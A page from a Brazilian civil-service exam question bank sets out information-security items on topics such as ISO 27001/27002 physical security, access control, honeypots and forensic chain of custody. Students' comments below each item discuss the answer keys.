Acerca da segurança de servidores e estações de trabalho, julgue os itens que se seguem.

Um firewall e ferramentas anti-spyware fazem parte da instalação básica do Windows 7. Além disso, a Microsoft oferece a solução de segurança Microsoft Security Essentials, que é paga e adquirida apenas se a cópia do Windows 7 for genuína.

Alternativas
Comentários
  • Errado.

    No Windows 7 temos firewall (Windows) + antispyware Windows Defender (Windows) + antivírus (terceiros) como soluções de segurança para o usuário ao acessar as redes de computadores.

    No Windows 7 podemos instalar o antivírus da Microsoft gratuitamente, sendo original ou não a cópia, o Microsoft Security Essentials. Se a cópia não for original, ele não será atualizado posteriormente. O MSE não é pago.

    No Windows 8 o software Windows Defender incorporou o Microsoft Security Essentials, então no W8 é antispyware e anitvírus ao mesmo tempo.

  • Gabarito Errado

    Que eu saiba o Windows 7 não vem com anti-spyware em sua instalação.

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • Complementando, o Microsoft Essentials não é pago. 

    Gabarito: E

  • Microsoft Security Essentials, um programa antivírus gratuito que ajuda a proteger seu computador contra vírus, spyware e outros [...].

    support.microsoft.com

  • GABARITO: ERRADO.

  • tem nego por aí achando que nem EXISTE Windows pago.

  • tem questões que a banca apela kkkkkk

  • Errado.

    No Windows 7 podemos instalar o antivírus da Microsoft gratuitamente, sendo original ou não a cópia, o Microsoft Security Essentials.

    *Se a cópia não for original, ele não será atualizado posteriormente. O MSE não é pago.

    No Windows 8 o software Windows Defender incorporou o Microsoft Security Essentials, então no W8 é antispyware e anitvírus ao mesmo tempo.


ID
895294
Banca
CESPE / CEBRASPE
Órgão
CNJ
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

Acerca da gestão de segurança da informação, conforme as normas
da ABNT, julgue os itens a seguir.

A segurança física e do ambiente é descrita na norma ABNT NBR ISO/IEC 27001, que estabelece orientação para segurança dos cabeamentos de energia e de telecomunicações, destacando o modo como esses cabeamentos devem ser protegidos contra interceptação ou danos.

Alternativas
Comentários
  • Resposta: Certa
    Justificativa: P agina 27 da ISO 27.001
               A.9.2.3 Segurança do cabeamento
                     Controle
                                  O cabeamento de energia e de telecomunicações que transporta dados ou dá suporte aos serviços de informações deve ser protegido contra interceptação ou danos.
  • Item Errado, conforme gabarito oficial definitivo.

    Vale destacar que o item foi devidamente retificado, uma vez que "o modo como esses cabeamentos devem ser protegidos" não é responsabilidade da 27001, mas sim da 27002. Note que a norma 27001 estabelece o que deve ser feito, enquanto a 27002 como deve ser feito.

    Para ratificar tal entedimento, basta observar a letra da norma relativa a essa matéria. Perceba que ela diz que "deve ser protegido", porém não especifica como.

    A.9.2.3 Segurança do cabeamento
                     Controle
                                  O cabeamento de energia e de telecomunicações que transporta dados ou dá suporte aos serviços de informações deve ser protegido contra interceptação ou danos.
  • Questão maliciosa. Conceito bem próximo do correto. Passei despercebido pela palavra modo.
  • Nao é modo, é como.
  • Ei, mas no Anexo A da 27001 não fala dos objetivos de controle e controles?? Os objetivos de controle que são descritos mais detalhadamente na 27002?? Creio que foi baseado nisso que a banca considerou correto. Me dei a opinião de vcs
  • Prezados,

    Inicialmente ela foi considerada como correta pela banca, mas teve seu gabarito alterado com a seguinte justificativa:
    “A norma ABNT NBR ISSO/IEC27001 não descreve o modo como deve ser realizado a segurança de cabeamento. Esse método é descrito pela norma ABNT NBR ISO/IEC27002, motivo pelo qual se opta pela alteração do gabarito do item.”  A questão está errada.
    Concordo com a alteração do gabarito, pois conforme sabemos, a NBR ISO/IEC 27001 estabelece os requisitos para o SGSI, se limitando a estabelecer o que o SGSI deve conter, não podendo ela “destacar o modo como esses cabeamentos devem ser protegidos” como estava transcrito no enunciado.
     
     
     
    Fonte : ABNT NBR ISO/IEC 27001
  • interceptação de dados = segura lógica e não física.


ID
906577
Banca
FCC
Órgão
TRT - 9ª REGIÃO (PR)
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

Convém que sejam utilizados perímetros de segurança (barreiras tais como paredes, portões de entrada controlados por cartão ou balcões de recepção com recepcionistas) para proteger as áreas que contenham informações e instalações de processamento da informação. Convém que sejam levadas em consideração e implementadas as seguintes diretrizes para perímetros de segurança física, quando apropriado:

I. os perímetros de segurança devem ser claramente definidos e a localização e capacidade de resistência de cada perímetro devem depender dos requisitos de segurança dos ativos existentes no interior do perímetro, e dos resultados da análi- se/avaliação de riscos.

II. os perímetros de um edifício ou de um local que contenha instalações de processamento da informação devem ser fisicamente sólidos (ou seja, o perímetro não deve ter brechas nem pontos onde poderia ocorrer facilmente uma invasão).

III. seja implantada uma área de recepção, ou outro meio para controlar o acesso físico ao local ou ao edifício; o acesso aos locais ou edifícios deve ficar restrito somente ao pessoal autorizado.

IV. devem ser construídas barreiras físicas, onde aplicável, para impedir o acesso físico não autorizado e a contaminação do meio ambiente.

Está correto o que se afirma em

Alternativas
Comentários
  • Questão baseada na ABNT NBR ISO/IEC 17799:2005 no tópico de Segurança física e do ambiente.
  • Segundo a ISO 27002,9.1.1 Perímetro de segurança física,"

    Diretrizes para a implementação

    Convém que sejam levadas em consideração e implementadas as seguintes diretrizes para perímetros de segurança física, quando apropriado:

    a) os perímetros de segurança sejam claramente definidos e que a localização e a capacidade de resistência de cada perímetro dependam dos requisitos de segurança dos ativos existentes no interior do perímetro, e dos resultados da análise/avaliação de riscos; (I)

    b) os perímetros de um edifício ou de um local que contenha instalações de processamento da informação sejam fisicamente sólidos (ou seja, o perímetro não deve ter brechas nem pontos onde poderia ocorrer facilmente uma invasão);(II)

    c) seja implantada uma área de recepção, ou um outro meio para controlar o acesso físico ao local ou ao edifício; o acesso aos locais ou edifícios deve ficar restrito somente ao pessoal autorizado;(III)

    d) sejam construídas barreiras físicas, onde aplicável, para impedir o acesso físico não autorizado e a contaminação do meio ambiente; (IV)"


ID
928633
Banca
CESPE / CEBRASPE
Órgão
SERPRO
Ano
2008
Provas
Disciplina
Segurança da Informação
Assuntos

Quanto à segurança da informação, julgue os itens de 89 a 95.

Um programa de segurança física procura combinar pessoas, processos, procedimentos e equipamentos para proteger recursos. Ao elaborar esse programa, deve-se: analisar riscos para identificar vulnerabilidades e ameaças (threats); definir os níveis de risco aceitáveis; definir métricas para avaliar os controles e contramedidas (countermeasure); identificar e implementar controles e contramedidas que visam inibir a ocorrência de crimes.

Alternativas
Comentários
  • Correto.
    O contexto da segurança da informação engloba a Segurança Física (descrita pela questão) e Segurança Lógica (que é voltada para todo o sistema computacional no que tange software, sistema de comunicação)
  • Fiquei confuso quando ele diz "a elaboração de um PROGRAMA de segurança".

    Ao meu ver seria uma POLÍTICA de segurança e não retratei como sinônimos.

    Enfim, marquei errado.

  • Crime? Tô no assunto certo? A gente tá falando de segurança da informação ou do código penal? :P

    Segurança da informação não está necessariamente ligado a inibir o crime, e sim proteger os interesses da organização, até porque boa parte das ameaças não são crimes, já que o código penal brasileiro é bem atrasado em relação a isso.

    Além disso, boa parte dos ataques que uma organização pode sofrer vêm de forma do país, onde a definição de crime pode ser outra.

  • Questão provavelmente desatualizada. Não vi escrito em lugar algum sobre segurança da informação procurar implementar medidas para inibir crimes (não diretamente).


ID
933997
Banca
CESPE / CEBRASPE
Órgão
SERPRO
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue os itens que se seguem, relativos a segurança computacional.


A exigência de que o usuário forneça um identificador e uma senha é suficiente para manter a segurança lógica em datacenters, não sendo necessário o monitoramento de logs de aplicações.

Alternativas
Comentários
  • Logs sempre foi e sempre SERÁ imprescindível!

     

    Gab Errado

  • O é Suficiente tá de cara que está errado ! Afinal em um sistema complexo só uma coisa nunca será suficiente

  • Gabarito Errado


    Questão se entrega logo na palavra "suficiente". Logs são essenciais para a segurança.


    Vamos na fé !




    "Retroceder Nunca Render-se Jamais !"

    Força e Fé !

    Fortuna Audaces Sequitur !

  • FAMOSA COLHER DE CHÁ.


ID
947329
Banca
CESPE / CEBRASPE
Órgão
SERPRO
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue o próximo item, referente a segurança física.

O conceito de perímetro de segurança deriva de técnicas matemáticas formuladas a partir da teoria da informação, sendo utilizado para criação de áreas físicas para isolar as pessoas dos ativos de informação da organização.

Alternativas
Comentários
  • Errado:  "O conceito de perímetro de segurança deriva de técnicas matemáticas formuladas a partir da teoria da informação, sendo utilizado para criação de áreas físicas para isolar as pessoas dos ativos de informação da organização."

    A expressão "perímetro de segurança" conduz apenas á definição de uma "área-limite" para segurança física da empresa. Nâo tem qualquer relação com técnicas matemáticas.

  • questão bem formulada... eu achei que não tinha nada a ver mesmo, mas vindo do cespe marquei certa


ID
1042528
Banca
CESPE / CEBRASPE
Órgão
MPU
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

A respeito de segurança da informação, julgue os itens subsequentes.

É possível controlar redes grandes utilizando-se a segmentação dessas redes em diferentes domínios de redes lógicas.

Alternativas
Comentários
  • Questão correta, como visto abaixo:

    A norma NBR ISO/IEC 17799 (2005) afirma, em um dos seus controles, que um método de controlar a segurança da informação em grandes redes é dividi-la em domínios de redes lógicas diferentes. De fato, esta é uma prática comum em redes de computadores estruturadas que garante acesso restrito a certos serviços. Por exemplo, uma instituição de ensino como uma faculdade, que possui laboratórios de informática utilizados por seus alunos, não seria conveniente que eles estivessem desenvolvendo suas pesquisas na mesma rede onde se encontra o servidor de banco de dados com suas notas, faltas e vida financeira. Tais dados poderiam estar em risco. Porém, também não seria conveniente para a instituição manter uma infra- estrutura física separada para atender apenas aos laboratórios, isso sairia caro, portanto com a divisão lógica da rede é possível manter apenas uma estrutura física impondo limites logicamente.

    Fonte: http://www.teleco.com.br/tutoriais/tutorialitil/pagina_4.asp

    Bons estudos!

  • Assertiva CORRETA. 


    "Divide and conquer..."

    Consiste em "quebrar" uma grande rede em redes menores para facilitar a gestão do todo. Técnica bastante utilizada e não só para poder gerir melhor a rede.
  • Certo. A segmentação pode ser realizada por meio de:

    Máscaras de redes e VLAN

    As máscaras de rede servem para segmentar as redes com seus respectivos endereços lógicos (IPs).

    As VLANs são realizadas no nível de enlace e também segmentam logicamente uma rede.

  • Sim, no caso das Vlans elas tem metodos de controle de trafego, mtu, controles de banda etc

ID
1200724
Banca
COPEVE-UFAL
Órgão
UFAL
Ano
2014
Provas
Disciplina
Segurança da Informação
Assuntos

Dadas as afirmativas a respeito dos conceitos de proteção e segurança relacionados à tecnologia da informação,

I. Se você receber um e-mail de phishing, você deve clicar em seus links e enviar suas informações.

II. O objetivo de um firewall em redes de computadores é impedir que vírus enviados via e-mail infectem o sistema.

III. O propósito do backup é restaurar o computador para um estado operacional após um desastre.

IV. O termo bug é atribuído a alguns tipos de vírus de computador.

verifica-se que está(ão) correta(s) apenas

Alternativas
Comentários
  • Letra (B).

    ----------

     

    I. Se você receber um e-mail de phishing, você NÃO deve clicar em seus links e enviar suas informações. 


    II. O objetivo de um firewall em redes de computadores é FILTRAR O QUE PASSA DE UMA REDE PARA OUTRA.
     

    III. O propósito do backup é restaurar o computador para um estado operacional após um desastre. [correto]
     

    IV. O termo bug é atribuído a ERROS NO CÓDIGO EM PROGRAMAS de computador.

     

    ----------

    At.te, CW.


ID
1222195
Banca
FCC
Órgão
SABESP
Ano
2014
Provas
Disciplina
Segurança da Informação
Assuntos

Todos os procedimentos de segurança listados abaixo referem-se a controles de acesso lógico, EXCETO:

Alternativas
Comentários
  • b - controle de acesso físico.

    (Dica do concurseiro - 30% estudo, 70% resolução de questões da banca. Lembre-se nem tudo que vale para uma banca vale para outra. Força, 2015 é nosso!!!)

  • Infelizmente acabaram os concursos. O pessoal que oferece cursos caríssimos na internet vive dizendo que não, mas a real é que de 2018 pra cá, com a mudança do governo, vai ser cada vez mais raro.

    v


ID
1348189
Banca
CESPE / CEBRASPE
Órgão
TRT - 8ª Região (PA e AP)
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

Considere que o rompimento de um cabo tenha interrompido a comunicação entre os usuários e o servidor que provê o acesso à Internet em uma organização que utiliza cabeamento estruturado. Com base nessa situação hipotética e na norma ABNT NBR ISO/IEC 27.001, assinale a opção em que é apresentada uma área de segurança da informação segundo a qual os controles implementados podem prevenir esse tipo de incidente.

Alternativas
Comentários
  • 11 Segurança física e do ambiente
    11.1 Áreas seguras
    Objetivo: Prevenir o acesso físico não autorizado, danos e interferências com os recursos de
    processamento das informações e as informações da organização.
    11.1.1 Perímetro de segurança física
    Controle
    Convém que perímetros de segurança  sejam definidos e usados para proteger tanto as áreas que
    contenham as instalações de processamento da informação como as informações críticas ou sensíveis.
    Diretrizes para implementação
    Convém que as seguintes diretrizes  sejam consideradas e implementadas, onde apropriado, para os
    perímetros de segurança física.


    letra a

    Norma ISO 27002-2013 pg 46

  • Resposta: LETRA A (SEGURANÇA FÍSICA)

    Na norma ABNT NBR ISO/IEC 27.001, como a questão pede, esse controle é previsto em: "Segurança do cabeamento" no item A,9.2.3

    A.9 Segurança física e do ambiente

    A.9.2 Segurança de equipamentos

    A.9.2.3 Segurança do cabeamento
    Controle
    O cabeamento de energia e de telecomunicações que
    transporta dados ou dá suporte aos serviços de informações
    deve ser protegido contra interceptação ou danos.

  • Gabarito A

    Segurança física é a forma de proteger equipamentos e informações contra usuários que não possuem autorização para acessá-los. Enquantosegurança lógica é um conjunto de recursos executados para proteger o sistema, dados e programas contra tentativas de acessos de pessoas ou programas desconhecidos.

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • LETRA "A" - marquei porque todas as outras estavam absurdamente erradas, mas quando li a alternativa "A" exclui de inicio dai voltei para ver o que aconteceu.

    Exatamente, ali temos causa de impedimento, dessa forma, não corre a prescrição entre esses cônjuges, mas em relação ao outro credor solidário, vai correr normalmente.


ID
1360225
Banca
CESGRANRIO
Órgão
Petrobras
Ano
2014
Provas
Disciplina
Segurança da Informação
Assuntos

Uma empresa necessita prover de forma definitiva mecanismos de segurança para os computadores de sua rede, pois os constantes problemas de energia elétrica têm prejudicado o armazenamento de dados nos servidores.

Para isso, essa empresa deve providenciar a(o)

Alternativas
Comentários
  • Um exemplo disso é o NoBreak.

     

    "Em teoria, um No-break pode trabalhar com qualquer equipamento eletrônico. E  mais do que fornecer energia, ele protege seus aparelhos. Um outro detalhe importante: os melhores No-breaks do mercado também oferecem a função de estabilizador. Isso é, através de um transformador, ele "limpa" e deixa a energia que sai da tomada mais linear. Até porque a energia elétrica que chega às casas aqui no Brasil sofre grandes oscilações. Mas... não se engane. Infelizmente, a função de estabilização embutida nos no-breaks só vale a pena mesmo nos modelos mais caros. "Temos que ter autonomia suficiente para acabarmos um trabalho que estamos fazendo calmamente, desligarmos aqueles equipamentos vitais, que não vão nos levar a perda de informações e cumprir tranquilamente a rotina de desligar estes aparelhos", completa Auster."

     

    fonte: para_que_serve_um_no-break_e_como_utiliza-lo_da_melhor_forma/19388>

  • Gabarito D para não.assinantes.


ID
1448296
Banca
CESGRANRIO
Órgão
LIQUIGÁS
Ano
2012
Provas
Disciplina
Segurança da Informação
Assuntos

Os mecanismos de segurança da informação proporcionam a implantação de diferentes tipos de controle.
Honeypot é exemplo de um recurso que pode implantar segurança por meio de controle

Alternativas
Comentários
  • Controle Lógico

     

    É a forma pela qual impede-se ou limita-se o acesso a informação através de um ambiente controlado. Ou seja, permite que os sistemas de tecnologia da informação verifiquem a autenticidade e identidade dos usuários que tentam acessá-los.

     

    Exemplos mais comuns:

     

    ● Mecanismos de criptografia;

    ● Assinatura Digital;

    ● Garantia de Integridade da Informação;

    ● Mecanismos de controle de acesso;

    ● Mecanismos de certificação;

    ● Honeypot

    ● Protocolos Seguros;

     

    Fonte: https://albertofelipeblog.files.wordpress.com/2016/05/trabalho-mecanismo-de-seguranc3a7a.pdf

     

    Resposta: Letra B. 

  • Resposta: Letra B

     

    Honeypot (tradução livre para o português: "pote de mel") é uma ferramenta que tem a função de propositalmente simular falhas de segurança de um sistema e colher informações sobre o invasor. É uma espécie de armadilha para invasores.

  • Honeypot é uma vulnerabilidade proposital para atrair o atacante e desviar sua atenção dos servidores e recursos importantes.

    Além disso, vale mencionar que essa técnica utilizada para atrair o atacante para determinado lugar, permite identificar o invasor, por onde ele entrou no sistema, qual era o seu alvo, dentre outros. Quanto mais tempo o invasor permanecer lá, mais informações serão possíveis coletar.


ID
1780099
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2015
Provas
Disciplina
Segurança da Informação
Assuntos

Acerca de segurança física e lógica, julgue o item subsecutivo.

A limitação no uso de mídias removíveis e o registro de cada uma são controles que limitam a oportunidade de perda de dados.

Alternativas
Comentários
  • Não entendi... Não seria correto dizer "vazamento" ao invés de perda?
  • Gabarito Certo

    Diego, acredito que a banca usou a palavra "perda" pelo motivo de backup.

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • De acordo com a norma 27002 :

     

    " 8.3.1. Gerenciamento de mídias removíveis

    ....

    Diretrizes para implementação

    Convém que as seguintes diretrizes para o gerenciamento de mídias removíveis sejam consideradas:

    ...

    g) as mídias removíveis sejam registradas para limitar a oportunidade de perda de dados;

    h) as unidades de mídias removíveis sejam habilitadas somente se houver uma necessidade do negócio; "

     

    Creio que o item (h) da norma justifique a correção do trecho " A limitação no uso de mídias removíveis"  na questão. O item (g), refere-se claramente ao trecho da questão " e o registro de cada uma são controles que limitam a oportunidade de perda de dados ".

     

    Espero ter ajudado!

  • Creio que em uma situação hipotética de um funcionário conectar/utilizar mídias removíveis pessoais infectadas por vírus ou qualquer malware em um computador pertencente a organização, contaminando os arquivos a ela pertencentes causando a infecção e consequentemente a perda dos dados.


ID
1780102
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2015
Provas
Disciplina
Segurança da Informação
Assuntos

Acerca de segurança física e lógica, julgue o item subsecutivo.

Em uma organização, um balcão de entrada com as respectivas recepcionistas não é considerado como uma barreira de controle de um perímetro de segurança física para a proteção de áreas que contenham informações confidenciais.

Alternativas
Comentários
  • Exemplo: Se um computador, de uma empresa de grande porte, estivesse a esmo em um balcão sem a presença de uma pessoa física (balconista) para prover a segurança, qualquer um poderia acessar os dados da empresa e coletar informações restritas, que são de agrado para um hacker

  • Gabarito: errado

    A questão fala do controle de acesso manual, controlados diretamente por ação humana, normalmente são realizados por vigias, porteiros ou recepcionistas.


ID
1839091
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2015
Provas
Disciplina
Segurança da Informação
Assuntos

Com relação à segurança lógica, julgue o próximo item.

O controle de acesso lógico não discricionário habilita os proprietários dos dados a determinarem quem pode ter acesso a arquivos e a recursos que lhes pertencem.

Alternativas
Comentários
  • Gabarito: Errado

     

    Dá para matar a questão só com interpretação de texto: "não discricionário habilita os proprietários dos dados a determinarem" - como que você determina algo não discricionário? - algo não discricinário é algo não passível de escolha.

     

    Mas vamos às definições teóricas:

     

    Controle de acesso discricionário
    O controle de acesso discricionário (discretionary access control ou DAC) é uma política de controle de acesso determinada pelo proprietário (owner) do recurso (um arquivo, por exemplo). O proprietário do recurso decide quem tem permissão de acesso em determinado recurso e qual privilégio ele tem.

     

    Controle de acesso obrigatório (não discricionário)
    No controle de acesso obrigatório (mandatory access control ou MAC) a política de acesso é determinada pelo sistema e não pelo proprietário do recurso.

     

    https://pt.wikipedia.org/wiki/Controle_de_acesso

     

  • Direitão ajudando na informática kkk

  • Com conhecimentos de direito ADM era possível resolver tb.

    ..discricionário habilita os proprietários dos dados a determinarem quem pode ter acesso..

    Foco!


ID
1839097
Banca
CESPE / CEBRASPE
Órgão
MEC
Ano
2015
Provas
Disciplina
Segurança da Informação
Assuntos

Com relação à segurança lógica, julgue o próximo item. 

Controle de acesso lógico é um mecanismo de segurança usado para prover confidencialidade no contexto da segurança da informação, assim como protocolos de transmissão e visões em bancos de dados.

Alternativas
Comentários
  • Já vi tudo mas nunca protocolos de transmissão. Alguém comenta?

  • Na minha opnião a questão está certa com exceção dos "protocolos de transmissão". Se a questão pelo menos limitasse o que seriam esses protocolos poderia marcar correto. Quando falamos em protocolos de transmissão podemos imaginar uma gama enorme, inclusive aqueles que não provem confidencialidade ou controles de acesso lógico.

     

    Questão muito confusa.

  • Visoes em bancos de dados não têm relacao com confidencialidade. O que garante a seguranca são as permissoes de acessos ao objeto, que seguem a mesma política de seguranca, independentemente se for uma visao (view) ou tabela.

  • Questão com comentários de 2016 e nenhuma explicação de Professores!

  • Gabarito: CERTO

    Ao falarmos em Controle de Acesso, podemos ter:

    • Controle de acesso físico: trata do fluxo de pessoas na organização com o uso de dispositivos físicos, de forma que possamos ter limitações ao acesso físico delas às dependências da organização.
    • Controle de acesso lógico: procedimentos, medidas, hardware, software e tecnologias de comunicação segura que têm por objetivo proteger dados, programas e sistemas contra tentativas de acesso não autorizadas. Faz uso de alguns recursos, como a lista de controle de acesso lógico, que são bases de dados, associadas a um objeto, que descrevem os relacionamentos entre objetos específicos e outros, garantindo assim a confidencialidade e a integridade dos dados.

ID
1864987
Banca
CESPE / CEBRASPE
Órgão
TRT - 8ª Região (PA e AP)
Ano
2016
Provas
Disciplina
Segurança da Informação
Assuntos

Correspondem a itens capazes de oferecer controle ou proteção no âmbito da segurança física preventiva

Alternativas
Comentários
  • GABARITO: ALTERNATIVA "B".


    Neste contexto, a biometria desponta como uma solução viável, já que a senha é o próprio corpo humano. A tecnologia baseada na biometria deve dispensar a necessidade de memorização de tantas senhas para cartões de crédito, banco, computador ou ambientes de acesso controlado. Uma rápida verificação da íris ou impressão digital poderá, por exemplo, autorizar uma transação bancária, permitir que uma pessoa registre o ponto ou tenha acesso a um estabelecimento (Folha de São Paulo Online, 2003 ).

  • ao se falar seguração algo reladado por senhas e por fisica algo tocavem dai vem a biometria.

  • ALTERNATIVA B

    Correspondem a itens capazes de oferecer controle ou proteção no âmbito da segurança física preventiva

    b) os dispositivos de autenticação biométrica. (física)

    Os itens A / C / D / E são sistemicas virtuais (senhas, criptografia, as trilhas de auditoria).


ID
1892524
Banca
IF-SE
Órgão
IF-SE
Ano
2016
Provas
Disciplina
Segurança da Informação
Assuntos

Uma estratégia de segurança em camadas NÃO DEVE:

Alternativas
Comentários
  • Implementa-se camadas de segurança com objetivos e intensidades diferentes, visando desestimular ou dificultar o sucesso da ameaça desde o inicio de sua investida, e caso ele obtenha sucesso ao ultrapassar uma barreira, ele encontre outras com estratégias diferentes para evitar que ele obtenha mais sucesso.

    A defesa em camadas prevê a implementação de fases com níveis de resistência crescentes

    Desencorajar, Dificultar, Discriminar, Deter e Diagnosticar.

     

  • Não entendi essa questão. Alguém explica, por favor ?

  • Gab: C
    Fui por eliminação e lógica mesmo rs.


ID
1980439
Banca
Aeronáutica
Órgão
CIAAR
Ano
2010
Provas
Disciplina
Segurança da Informação
Assuntos

Sobre as características dos tipos de segurança física a centros de processamento de dados, correlacione as colunas abaixo e, em seguida, assinale a alternativa que contém a sequência correta. 

( ) A fiação do CPD deve ser única e independente, visando a evitar a penetração de ruídos. 

( ) Os equipamentos de transmissão devem ser mantidos em locais seguros. 

( ) Devem ser instalados alarmes interligados a uma central de monitoração de segurança. 

( ) Para as situações de contingência, deve-se fazer o uso de geradores de energia.

( ) Os servidores devem ser agrupados em locais que não façam uso de material combustível e possuir identificação para facilitar a sua localização, manutenção e operação. 


1. Segurança de equipamentos. 

2. Prevenção e combate a incêndio. 

3. Segurança ambiental. 

Alternativas

ID
2246968
Banca
Marinha
Órgão
Quadro Técnico
Ano
2016
Provas
Disciplina
Segurança da Informação
Assuntos

Nenhum sistema pode ser considerado 100% seguro, assim sendo, há preocupação cada vez mais constante das empresas quanto à segurança da informação. Sobre esse tema, assinale a opção correta.

Alternativas
Comentários
  • Gabarito D

    Segurança em quatro níveis: físico, humano, sistema operacional e rede.

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

     

  • Físico - enunciado no item a)

    Humano - medidas de segurança que abordam a engenharia social

    SO - Instalação de anti-vírus, configurações de serviços de segurança (IDS, etc) e firewall

    Rede - proteção em todas as camadas (Física, Enlace, Rede, Transporte e Aplicação)

  • D- Para se ter um ambiente protegido, devem-se tomar medidas de segurança em quatro níveis: físico, humano, sistema operacional e rede. 

  • Questão dada. Letra D


ID
2306035
Banca
CESPE / CEBRASPE
Órgão
SEDF
Ano
2017
Provas
Disciplina
Segurança da Informação
Assuntos

Relativamente a segurança da informação, julgue o item subsequente.

No contexto da segurança física, é classificado como de risco intermediário um ambiente computacional organizacional que, sem ter asseguradas as condições mínimas de funcionamento e processamento das informações, seja capaz de levar a organização a ter sérios problemas ou incorrer em grandes prejuízos.

Alternativas
Comentários
  • Com certeza. Considere a seguinte situação:

    Uma pessoa que consegue acesso não autorizado a alguns documentos confidenciais de uma empresa e que nele contém informações que podem colocar o futuro da organização em risco.

    Portanto, é necessário um controle rigoroso quanto ao acesso físico de uma corporação.

  • Errei pois achei que grandes prejuizos e serios problemas fossem mais que um "risco intermediário"...

  • Penso que um controle rigoroso deveria estar relacionado a um nível de risco mais elevado que "intermediário".

  • Segurança física?

  • Como segurança física pode estar relacionada ao funcionamento e processamento das informações?

  • ISO 27001/2 não foi falada na questão, ficou completamente aberta a interpretação. Deveria ser anulada.

  • intermediario?????????? queria saber onde o cespe achou isso

  • sérios problemas ou incorrer em grandes prejuízos = risco intermediário???

    WTF!!???

  • Eu já vi isso na 27002, mas um pouco diferente. Eles falaram disso na parte de ativos, em que a classificação de informação pode ser baseada em 4 níveis:

     

    "a) quando sua divulgação não causa nenhum dano;
    b) quando a divulgação causa constrangimento menor ou inconveniência operacional menor;
    c) quando a divulgação tem um pequeno impacto significativo nas operações ou objetivos táticos;
    d) quando a divulgação tem um sério impacto sobre os objetivos estratégicos de longo prazo, ou
    coloca a sobrevivência da organização em risco."

    Acho que eles atentaram mais para a organização em risco. Não encontrei nada relacionado na parte de segurança física.
     

  • Talvez intermediário, por levar em concideração que os dados não estariam armazenados em um só local, usando em sua política de segurança, outros locais para bacape... assim em caso de desastre, comprometeria a estrutura física e lógica, mas com a existência de um becape isto seria resolvido... 

  • Acho que esta parte é que esta se refereindo a questão ..."sem ter asseguradas as condições mínimas de funcionamento e processamento das informações"... Uma vez que não esta assegurado os danos irão ocorrer, mas caso estivessem assegurados e os danos ocorrecem o risco estaria num nivel maior.

  • Pessoal,

    penso assim:

    Grandes prejuízos - riscos intermediários;

    Risco de falência - riscos altos.

    Só fazendo uma rápida analogia:

    A instituição pode vir a ser acometida com grandes prejuízos, mas sem ter a possibilidade de ir a falência.

    É o caso da empresa VALE (caso brumadinho) - grandes preuízos, mas a empresa não fechará - nesse caso riscos intermediários para o negócio dela.

    Go @head!!!

  • Fonte: imaginação do examinador
  • Rapaz, francamente.

    "Sem ter asseguradas as condições mínimas de funcionamento e processamento das informações, seja capaz de levar a organização a ter sérios problemas ou incorrer em grandes prejuízos..."

    1- Não tem condições mínimas de funcionamento

    2- Não tem condições mínimas de processamento das informações

    3- É capaz de levar a organização a ter sérios problemas

    4- É capaz de causas grandes prejuízos

    RISCO: INTERMEDIÁRIO, Hahaha

    Tomara que o cara que criou essa questão só fique por ai mesmo, porque se virar gestor de TI coitada da empresa.

  • SUBJETIVO, ABSURDA A QUESTÃO

  • O examinador dessa questão usou como fonte pra elabora-la a imaginação do Marcelo Rebolos[1].

    OBS: Galera, nada de achismos, bora justificar sempre com fontes sérias. Não achei nada a respeito dessa questao.

    Misericordia, mas, pra cima deles, moçada!

    Fonte:

    [1] Aqui mesmo dos comentarios.

  • Esse examinador não é de TI. Não é possível.

  • Intermediário? Oi?

  • aquele momento em que a LÓGICA não serve de nada.

    "sérios problemas e grandes prejuízos" = intermediário.

    socorroooo


ID
2575792
Banca
IESES
Órgão
IGP-SC
Ano
2017
Provas
Disciplina
Segurança da Informação
Assuntos

Os sistemas computacionais estão cada vez mais presentes no cotidiano da humanidade. Com isso, aumenta também a quantidade de registros/vestígios de utilização destes sistemas. Sobre os Vestígios Cibernéticos é correto afirmar:

Alternativas
Comentários
  • Alternativas com muitas falhas! Não é preciso saber muito do conceito!

     

    a) É o conjunto de informações encontradas somente nos arquivos ativos das de memórias não voláteis (HD, pendrive, cartão de memória, mídias óticas). 

     

     

    c) É o conjunto de informações encontradas somente em memórias não voláteis como: disco rígido, cartão de memória e pendrive. 

     

     

    d) É o conjunto de informações obtidas exclusivamente dos registros do servidor de rede responsáveis pela conectividade da máquina investigada. 

     

     

     

    Letra B - Gab

  • Gabarito B

    Esse tipo de vestígio pode ser definido como o conjunto de informações extraídas de um sistema computacional que permita esclarecer os fatos por trás de um crime ou fato em apuração. Na busca por essas evidências, o consagrado princípio de LOCARDouprincípio da transferência, encontra abrigo na realidade moderna da computação digital.

    Classificação dos vestígios

    1.      Identificação

    2.      Isolamento

    3.      Registro

    4.      Coleta

    5.      Preservação

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !


ID
2624230
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Acerca dos procedimentos da análise forense digital e cadeia de custódia, julgue o item a seguir.


Em análise forense digital, o início da cadeia de custódia ocorre a partir da duplicação pericial do vestígio previamente adquirido.

Alternativas
Comentários
  • A cadeia de custódia contribui para manter e documentar a história cronológica da evidência, para rastrear a posse e o manuseio da amostra a partir do preparo do recipiente coletor, da coleta, do transporte, do recebimento, da análise e do armazenamento. Inclui toda a seqüência de posse. (SMITH et al, 1990).

    http://www.egov.ufsc.br/portal/conteudo/cadeia-de-cust%C3%B3dia-e-prova-pericial

  • A evidência original por si só já deve ser submetida a uma cadeia de custódia, uma vez que a integridade dela será a base para a perícia válida em uma imagem duplicada.

  • putzz, eu vou duplicar o vestígio?

